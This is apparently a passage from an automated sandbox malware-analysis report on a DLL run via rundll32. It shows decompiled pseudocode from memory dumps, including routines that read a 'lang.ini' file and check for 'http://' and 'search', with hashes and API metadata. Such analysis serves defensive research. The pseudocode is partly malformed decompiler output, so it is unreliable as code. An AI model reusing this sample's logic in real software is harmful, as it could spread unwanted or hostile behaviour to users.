            											_t216 = E1000CEF0(_t346[0x12], _t300, _t346[0x13]);
            											_v17 = _t216;
            											_t301 = 0x18;
            											_t218 = E1000CEF0(_t346[0x12], _t301, _t346[0x13]);
            											_t285 = _t346[0x17];
            											_v16 = _t218;
            											_v15 = _t346[0x16];
            											_t302 = 8;
            											_t221 = E1000CEF0(_t346[0x16], _t302, _t285);
            											_v14 = _t221;
            											_t303 = 0x10;
            											_t223 = E1000CEF0(_t346[0x16], _t303, _t285);
            											_v13 = _t223;
            											_t304 = 0x18;
            											_t332 = _t285;
            											_v12 = E1000CEF0(_t346[0x16], _t304, _t285);
            											_t101 =  &_v28; // 0x55
            											_push(9);
            											_push( &_v56);
            											E1000CD50( &_v56, _t346);
            											_push(_t346);
            											_push(E1000BCE1);
            											 *((char*)(_v602 + 2)) = 5;
            											_push( &_v920);
            											_t231 = E1000AED1(_t304);
            											_t350 = _t349 + 0x18;
            											__eflags = _t231;
            											if(_t231 == 0) {
            												_t109 = _v896 + 0x1e; // 0x2f
            												_t233 = _v892 + _t109;
            												_t346[5] = _t346[5] + _t233;
            												__eflags = _t346[4];
            												if(_t346[4] == 0) {
            													_t339 =  *_t346;
            													_t286 =  &(_t346[0xa]);
            													__eflags = _t339;
            													 *_t286 = 0x12345678;
            													_t346[0xb] = 0x23456789;
            													_t346[0xc] = 0x34567890;
            													if(_t339 == 0) {
            														L44:
            														__eflags =  *0x10017fa4;
            														if( *0x10017fa4 == 0) {
            															0x10037ff5(_t233);
            															0x10031c8a();
            															 *_t286 =  *_t286 ^ 0xe85057f8;
            															asm("insd");
            															asm("pushad");
            															__eflags = _t233 +  *_t233;
            														}
            														_t340 = 0;
            														__eflags = 0;
            														do {
            															 *((char*)(_t347 + _t340 - 0x28)) = rand() >> 7;
            															_t340 = _t340 + 1;
            															__eflags = _t340 - 0xc;
            														} while (_t340 < 0xc);
            														_v33 = _v912 >> 8;
            														_t287 = 0;
            														__eflags = 0;
            														do {
            															_t341 = _t347 + _t287 - 0x28;
            															_t240 = E1000B8A2(__eflags,  &(_t346[0xa]),  *((intOrPtr*)(_t347 + _t287 - 0x28)));
            															_t287 = _t287 + 1;
            															__eflags = _t287 - 0xc;
            															 *_t341 = _t240;
            														} while (__eflags < 0);
            														_t288 = 0;
            														__eflags =  *_t346;
            														if( *_t346 == 0) {
            															L56:
            															__eflags = 0;
            															L57:
            															__eflags = _a19;
            															_t346[9] = 0;
            															if(_a19 != 0) {
            																_t342 = _v8;
            																_t346[0x20] = _t288;
            																L64:
            																_t346[9] = _t346[9] & 0x00000000;
            																E1000C233(_t346);
            																_t309 = _t346[0x20];
            																_t186 = _t346[4];
            																_t346[5] = _t346[5] + _t309;
            																__eflags = _t186;
            																if(_t186 != 0) {
            																	goto L90;
            																}
            																__eflags = _t288;
            																if(_t288 != 0) {
            																	L80:
            																	return 0x400;
            																}
            																_t333 = _t346[0x1b];
            																_t245 = _v32 + _t309;
            																_v908 = _t346[0x1b];
            																__eflags = _v904 - _t245;
            																_v904 = _t245;
            																_t310 = _t309 & 0xffffff00 | _v904 == _t245;
            																__eflags = _t346[6] - _t288;
            																_v900 = _t346[0x19];
            																if(_t346[6] == _t288) {
            																	L75:
            																	__eflags = _v914 - _t342;
            																	if(_v914 != _t342) {
            																		L78:
            																		return 0x4000000;
            																	}
            																	__eflags = _t342;
            																	if(_t342 != 0) {
            																		L79:
            																		_push(_t346);
            																		_push(E1000BCE1);
            																		_push( &_v920);
            																		_t249 = E1000B113(_t310);
            																		__eflags = _t249;
            																		if(_t249 == 0) {
            																			_t169 =  &(_t346[5]);
            																			 *_t169 = _t346[5] + 0x10;
            																			__eflags =  *_t169;
            																			_v916 = _v876;
            																			L82:
            																			_t186 = _t346[4];
            																			__eflags = _t186;
            																			if(__eflags != 0) {
            																				goto L90;
            																			}
            																			_t251 = E1000CCAE(_t186, _t288, _t310, _t333, _t342, _t346, _t347, __eflags, _t354, _v888);
            																			_push(_v888);
            																			_t343 = _t251;
            																			_push(_v602);
            																			_push(_t343);
            																			_t252 = E1000CD50(_t251, _t346);
            																			_v602 = _t343;
            																			_t289 = E1000CCAE(_t252, _t288, _t310, _t333, 0x35e, _t346, _t347, __eflags, _t354, 0x35e);
            																			_push(0x35e);
            																			_push( &_v920);
            																			_push(_t289);
            																			E1000CD50( &_v920, _t346);
            																			_t256 = _t346[0xf];
            																			__eflags = _t256;
            																			if(_t256 != 0) {
            																				while(1) {
            																					_t311 =  *(_t256 + 0x35a);
            																					__eflags = _t311;
            																					if(_t311 == 0) {
            																						break;
            																					}
            																					_t256 = _t311;
            																				}
            																				 *(_t256 + 0x35a) = _t289;
            																				L88:
            																				return 0;
            																			}
            																			_t346[0xf] = _t289;
            																			goto L88;
            																		}
            																		goto L80;
            																	}
            																	__eflags = _t310;
            																	if(_t310 != 0) {
            																		goto L79;
            																	}
            																	goto L78;
            																}
            																__eflags =  *_t346 - _t288;
            																if( *_t346 == _t288) {
            																	L69:
            																	__eflags = _v916 & 0x00000001;
            																	_v914 = _t342;
            																	if((_v916 & 0x00000001) == 0) {
            																		_t158 =  &_v916;
            																		 *_t158 = _v916 & 0x0000fff7;
            																		__eflags =  *_t158;
            																	}
            																	_t312 = _t346;
            																	_v876 = _v916;
            																	_t261 = E1000BDCB(_t346, _v870 - _t346[3]);
            																	__eflags = _t261;
            																	if(_t261 == 0) {
            																		L74:
            																		return 0x2000000;
            																	} else {
            																		_push(_t346);
            																		_push(E1000BCE1);
            																		_push( &_v920);
            																		_t264 = E1000AED1(_t312);
            																		__eflags = _t264;
            																		if(_t264 != 0) {
            																			goto L80;
            																		}
            																		_t310 = _t346;
            																		_t265 = E1000BDCB(_t346, _t346[5]);
            																		__eflags = _t265;
            																		if(_t265 != 0) {
            																			goto L82;
            																		}
            																		goto L74;
            																	}
            																}
            																__eflags = _a19 - _t288;
            																if(_a19 == _t288) {
            																	goto L75;
            																}
            																goto L69;
            															}
            															_t342 = _v8;
            															__eflags = _t342 - 8;
            															if(_t342 != 8) {
            																__eflags = _t342;
            																if(_t342 != 0) {
            																	goto L64;
            																}
            																_t266 = E1000C354(_t354);
            																L60:
            																_t288 = _t266;
            																goto L64;
            															}
            															_t266 = E1000C272(_t346, _t332, _t347, _t354,  &_v920);
            															goto L60;
            														}
            														__eflags = _a19;
            														if(_a19 == 0) {
            															E1000BCE1(_t346,  &_v44, 0xc);
            															_t350 = _t350 + 0xc;
            															_t128 =  &(_t346[5]);
            															 *_t128 = _t346[5] + 0xc;
            															__eflags =  *_t128;
            														}
            														__eflags =  *_t346 - _t288;
            														if( *_t346 == _t288) {
            															goto L56;
            														} else {
            															__eflags = _a19;
            															if(_a19 != 0) {
            																goto L56;
            															}
            															_push(1);
            															_pop(0);
            															goto L57;
            														}
            													} else {
            														goto L42;
            													}
            													while(1) {
            														L42:
            														_t233 =  *_t339;
            														__eflags = _t233;
            														if(_t233 == 0) {
            															goto L44;
            														}
            														_t233 = E1000B834(_t286, _t233);
            														_t339 = _t339 + 1;
            														__eflags = _t339;
            														if(_t339 != 0) {
            															continue;
            														}
            														goto L44;
            													}
            													goto L44;
            												}
            												E1000C233(_t346);
            												return _t346[4];
            											}
            											E1000C233(_t346);
            											goto L80;
            										}
            									}
            									_push(_a12);
            									_t293 = _t346;
            									_push(_a8);
            									_t186 = E1000C049(0, _t346, _t334);
            									goto L27;
            								}
            								_push(_a12);
            								_t293 = _t346;
            								_push(_a8);
            								_t186 = L1000BF37(_t185, _t346, _t323);
            								goto L27;
            							}
            							_t293 = _t346;
            							_t186 = E1000BEBF(_t346, _t323, _a8);
            							goto L27;
            						}
            						_t185 = E1000B8C7(_t292, __eflags,  &_v1180);
            						__eflags = _t185;
            						if(_t185 == 0) {
            							goto L19;
            						}
            						goto L18;
            					}
            					_push( &_v1180);
            					_t185 = E1000CD02(_t292, _t346);
            					__eflags =  *((char*)(_t347 + _t185 - 0x499)) - 0x2f;
            					_pop(_t292);
            					if( *((char*)(_t347 + _t185 - 0x499)) == 0x2f) {
            						goto L15;
            					}
            					_a7 = 1;
            					goto L16;
            				} else {
            					return 0x50000;
            				}
            			}














































































































            0x1000c3ab
            0x1000c3ab
            0x1000c3ab
            0x1000c3b6
            0x1000c3be
            0x00000000
            0x1000c3c0
            0x1000c3ca
            0x1000c3ce
            0x1000c3da
            0x1000c3dc
            0x1000c3df
            0x1000c3e2
            0x1000c3e4
            0x1000c3e7
            0x1000c3e9
            0x1000c3e9
            0x1000c3e7
            0x1000c3f0
            0x1000c3fa
            0x1000c3ff
            0x1000c407
            0x1000c408
            0x1000c9ab
            0x00000000
            0x1000c9ab
            0x1000c40e
            0x1000c414
            0x1000c414
            0x1000c417
            0x1000c419
            0x1000c419
            0x1000c41c
            0x1000c41d
            0x1000c41d
            0x1000c422
            0x1000c425
            0x1000c429
            0x1000c42d
            0x1000c44c
            0x1000c44c
            0x1000c44c
            0x1000c44c
            0x1000c450
            0x1000c450
            0x1000c454
            0x1000c45b
            0x1000c46e
            0x1000c46e
            0x1000c471
            0x1000c471
            0x1000c474
            0x1000c482
            0x1000c485
            0x1000c496
            0x1000c499
            0x1000c4aa
            0x1000c4ad
            0x00000000
            0x00000000
            0x1000c4b3
            0x1000c4b5
            0x1000c4ba
            0x1000c4ba
            0x1000c4bc
            0x1000c9b4
            0x1000c9b4
            0x1000c9b4
            0x1000c4cd
            0x1000c4cf
            0x1000c4d2
            0x1000c4dd
            0x1000c4e5
            0x1000c4f0
            0x1000c4f1
            0x1000c4f6
            0x1000c4f9
            0x1000c4fd
            0x1000c503
            0x1000c50b
            0x1000c511
            0x1000c516
            0x1000c516
            0x1000c516
            0x1000c51d
            0x1000c51d
            0x1000c524
            0x1000c526
            0x1000c52e
            0x1000c531
            0x1000c538
            0x1000c53e
            0x1000c545
            0x1000c548
            0x1000c54f
            0x1000c558
            0x1000c561
            0x1000c567
            0x1000c56d
            0x1000c576
            0x1000c578
            0x1000c57c
            0x1000c57e
            0x1000c57e
            0x1000c57c
            0x1000c58e
            0x1000c595
            0x1000c598
            0x1000c59a
            0x1000c5a1
            0x1000c5b7
            0x1000c5b7
            0x00000000
            0x1000c5a3
            0x1000c5a3
            0x1000c5a6
            0x1000c5a8
            0x00000000
            0x00000000
            0x1000c5af
            0x1000c5bd
            0x1000c5c3
            0x1000c5cc
            0x1000c5db
            0x1000c5e3
            0x1000c5e7
            0x1000c5f0
            0x1000c5f9
            0x1000c604
            0x1000c607
            0x1000c60c
            0x1000c616
            0x1000c620
            0x1000c624
            0x1000c628
            0x1000c62c
            0x1000c630
            0x1000c637
            0x1000c63a
            0x1000c63f
            0x1000c646
            0x1000c649
            0x1000c659
            0x1000c661
            0x1000c664
            0x1000c669
            0x1000c670
            0x1000c673
            0x1000c678
            0x1000c67f
            0x1000c682
            0x1000c687
            0x1000c68f
            0x1000c692
            0x1000c69a
            0x1000c69d
            0x1000c6a2
            0x1000c6a9
            0x1000c6ac
            0x1000c6b1
            0x1000c6b8
            0x1000c6bb
            0x1000c6be
            0x1000c6c5
            0x1000c6c8
            0x1000c6cb
            0x1000c6d1
            0x1000c6d2
            0x1000c6dd
            0x1000c6de
            0x1000c6e3
            0x1000c6ed
            0x1000c6ee
            0x1000c6f3
            0x1000c6f6
            0x1000c6f8
            0x1000c712
            0x1000c712
            0x1000c716
            0x1000c719
            0x1000c71d
            0x1000c72e
            0x1000c730
            0x1000c733
            0x1000c735
            0x1000c73b
            0x1000c742
            0x1000c749
            0x1000c75d
            0x1000c75d
            0x1000c764
            0x1000c767
            0x1000c76e
            0x1000c773
            0x1000c779
            0x1000c77a
            0x1000c77b
            0x1000c77d
            0x1000c77e
            0x1000c77e
            0x1000c780
            0x1000c789
            0x1000c78d
            0x1000c78e
            0x1000c78e
            0x1000c79c
            0x1000c79f
            0x1000c79f
            0x1000c7a1
            0x1000c7a5
            0x1000c7ae
            0x1000c7b3
            0x1000c7b5
            0x1000c7b9
            0x1000c7b9
            0x1000c7bd
            0x1000c7bf
            0x1000c7c1
            0x1000c7ea
            0x1000c7ea
            0x1000c7ec
            0x1000c7ec
            0x1000c7f0
            0x1000c7f3
            0x1000c81c
            0x1000c81f
            0x1000c825
            0x1000c825
            0x1000c82b
            0x1000c830
            0x1000c836
            0x1000c839
            0x1000c83c
            0x1000c83e
            0x00000000
            0x00000000
            0x1000c844
            0x1000c846
            0x1000c921
            0x00000000
            0x1000c921
            0x1000c84f
            0x1000c852
            0x1000c854
            0x1000c85a
            0x1000c860
            0x1000c869
            0x1000c86c
            0x1000c86f
            0x1000c875
            0x1000c8ed
            0x1000c8ed
            0x1000c8f4
            0x1000c8fe
            0x00000000
            0x1000c8fe
            0x1000c8f6
            0x1000c8f8
            0x1000c908
            0x1000c908
            0x1000c90f
            0x1000c914
            0x1000c915
            0x1000c91d
            0x1000c91f
            0x1000c932
            0x1000c932
            0x1000c932
            0x1000c936
            0x1000c93d
            0x1000c93d
            0x1000c940
            0x1000c942
            0x00000000
            0x00000000
            0x1000c94a
            0x1000c94f
            0x1000c955
            0x1000c957
            0x1000c95d
            0x1000c95e
            0x1000c963
            0x1000c974
            0x1000c97c
            0x1000c97d
            0x1000c97e
            0x1000c97f
            0x1000c984
            0x1000c98a
            0x1000c98c
            0x1000c993
            0x1000c993
            0x1000c999
            0x1000c99b
            0x00000000
            0x00000000
            0x1000c99d
            0x1000c99d
            0x1000c9a1
            0x1000c9a7
            0x00000000
            0x1000c9a7
            0x1000c98e
            0x00000000
            0x1000c98e
            0x00000000
            0x1000c91f
            0x1000c8fa
            0x1000c8fc
            0x00000000
            0x00000000
            0x00000000
            0x1000c8fc
            0x1000c877
            0x1000c879
            0x1000c880
            0x1000c880
            0x1000c887
            0x1000c88e
            0x1000c890
            0x1000c890
            0x1000c890
            0x1000c890
            0x1000c8a0
            0x1000c8a2
            0x1000c8b3
            0x1000c8b8
            0x1000c8ba
            0x1000c8e3
            0x00000000
            0x1000c8bc
            0x1000c8bc
            0x1000c8c3
            0x1000c8c8
            0x1000c8c9
            0x1000c8d1
            0x1000c8d3
            0x00000000
            0x00000000
            0x1000c8d8
            0x1000c8da
            0x1000c8df
            0x1000c8e1
            0x00000000
            0x00000000
            0x00000000
            0x1000c8e1
            0x1000c8ba
            0x1000c87b
            0x1000c87e
            0x00000000
            0x00000000
            0x00000000
            0x1000c87e
            0x1000c7f5
            0x1000c7f8
            0x1000c7fb
            0x1000c80f
            0x1000c811
            0x00000000
            0x00000000
            0x1000c815
            0x1000c80b
            0x1000c80b
            0x00000000
            0x1000c80b
            0x1000c806
            0x00000000
            0x1000c806
            0x1000c7c3
            0x1000c7c6
            0x1000c7cf
            0x1000c7d4
            0x1000c7d7
            0x1000c7d7
            0x1000c7d7
            0x1000c7d7
            0x1000c7db
            0x1000c7dd
            0x00000000
            0x1000c7df
            0x1000c7df
            0x1000c7e3
            0x00000000
            0x00000000
            0x1000c7e5
            0x1000c7e7
            0x00000000
            0x1000c7e7
            0x00000000
            0x00000000
            0x00000000
            0x1000c74b
            0x1000c74b
            0x1000c74b
            0x1000c74d
            0x1000c74f
            0x00000000
            0x00000000
            0x1000c753
            0x1000c759
            0x1000c759
            0x1000c75b
            0x00000000
            0x00000000
            0x00000000
            0x1000c75b
            0x00000000
            0x1000c74b
            0x1000c721
            0x00000000
            0x1000c726
            0x1000c6fc
            0x00000000
            0x1000c6fc
            0x1000c5a1
            0x1000c49b
            0x1000c49e
            0x1000c4a0
            0x1000c4a3
            0x00000000
            0x1000c4a3
            0x1000c487
            0x1000c48a
            0x1000c48c
            0x1000c48f
            0x00000000
            0x1000c48f
            0x1000c479
            0x1000c47b
            0x00000000
            0x1000c47b
            0x1000c464
            0x1000c469
            0x1000c46c
            0x00000000
            0x00000000
            0x00000000
            0x1000c46c
            0x1000c435
            0x1000c436
            0x1000c43b
            0x1000c443
            0x1000c444
            0x00000000
            0x00000000
            0x1000c446
            0x00000000
            0x1000c3d0
            0x00000000
            0x1000c3d0

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: /$UT
            • API String ID: 0-1626504983
            • Opcode ID: 011cfa80826d7be16224f1e05208e39277c528805b706d3603a9fdb0960ef0be
            • Instruction ID: 2ff0a1464254cde498339df49cc164f73800a0e7302aa6a381dd2afc7f8218aa
            • Opcode Fuzzy Hash: 011cfa80826d7be16224f1e05208e39277c528805b706d3603a9fdb0960ef0be
            • Instruction Fuzzy Hash: 2C02D375A0438D9BEB21CF68C845F9EBBF5EF04380F1444AEE449A7246CB70AE85CB51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E10005CF7(intOrPtr _a4, intOrPtr _a8) {
            				char _v8;
            				void _v267;
            				char _v268;
            				void* _t20;
            				signed int _t26;
            				signed int _t30;
            
            				_t30 = 0x40;
            				_v268 = 0;
            				memset( &_v267, 0, _t30 << 2);
            				asm("stosw");
            				asm("stosb");
            				E10003EF4( &_v268, "%s\\lang.ini", 0x100167d0);
            				if(E10003F72( &_v268) != 0) {
            					_v8 = 0;
            					_t20 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
            					_t36 = _t20;
            					if(_t20 == 0xffffffff) {
            						goto L1;
            					}
            					E10004035(_t36, _a4, _a8,  &_v8, 0);
            					E10003F92(_t36);
            					if(E10003F7D(_a4, "http://") == 0) {
            						goto L1;
            					}
            					_t26 = E10003F7D(_a4, "search");
            					asm("sbb eax, eax");
            					return  ~_t26 + 1;
            				}
            				L1:
            				return 0;
            			}









            0x10005d07
            0x10005d10
            0x10005d1b
            0x10005d1d
            0x10005d1f
            0x10005d2c
            0x10005d42
            0x10005d5e
            0x10005d61
            0x10005d66
            0x10005d6e
            0x00000000
            0x00000000
            0x10005d7c
            0x10005d82
            0x10005d99
            0x00000000
            0x00000000
            0x10005da3
            0x10005dab
            0x00000000
            0x10005dae
            0x10005d44
            0x00000000

            APIs
              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,100167D0,?,00000000,00080000), ref: 10003F76
            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
            • String ID: %s\lang.ini$http://$search
            • API String ID: 1721638100-482061809
            • Opcode ID: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
            • Instruction ID: 8c54ec75ac406b03aa883dad07c62b5b690cd8483bd5bdce465cc98b2d904575
            • Opcode Fuzzy Hash: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
            • Instruction Fuzzy Hash: 971106769081197FFB61DAA4CC42FDB776CDB143D5F1045B2FB48A9080EA71AFC44A60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E10005C4C(intOrPtr _a4, intOrPtr _a8) {
            				char _v8;
            				void _v267;
            				char _v268;
            				void* _t19;
            				signed int _t24;
            				signed int _t28;
            
            				_t28 = 0x40;
            				_v268 = 0;
            				memset( &_v267, 0, _t28 << 2);
            				asm("stosw");
            				asm("stosb");
            				E10003EF4( &_v268, "%s\\lang.ini", 0x100167d0);
            				if(E10003F72( &_v268) != 0) {
            					_v8 = 0;
            					_t19 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
            					_t32 = _t19;
            					if(_t19 == 0xffffffff) {
            						goto L1;
            					}
            					E10004035(_t32, _a4, _a8,  &_v8, 0);
            					E10003F92(_t32);
            					_t24 = E10003F7D(_a4, "http://");
            					asm("sbb eax, eax");
            					return  ~( ~_t24);
            				}
            				L1:
            				return 0;
            			}









            0x10005c5c
            0x10005c65
            0x10005c70
            0x10005c72
            0x10005c74
            0x10005c81
            0x10005c97
            0x10005cb3
            0x10005cb6
            0x10005cbb
            0x10005cc3
            0x00000000
            0x00000000
            0x10005cd1
            0x10005cd7
            0x10005ce4
            0x10005cee
            0x00000000
            0x10005cf0
            0x10005c99
            0x00000000

            APIs
              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,100167D0,?,00000000,00080000), ref: 10003F76
            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
            • String ID: %s\lang.ini$http://
            • API String ID: 1721638100-679094439
            • Opcode ID: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
            • Instruction ID: 384da5e59b1e856c45bbe6372d81ece75bf9070c03a2386a6f56754dbd155cb7
            • Opcode Fuzzy Hash: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
            • Instruction Fuzzy Hash: 601104769041197EFB21DAA4CC42FDB776CDB143C4F0085B1FA48B6080EA71AF844660
            Uniqueness

            Uniqueness Score: -1.00%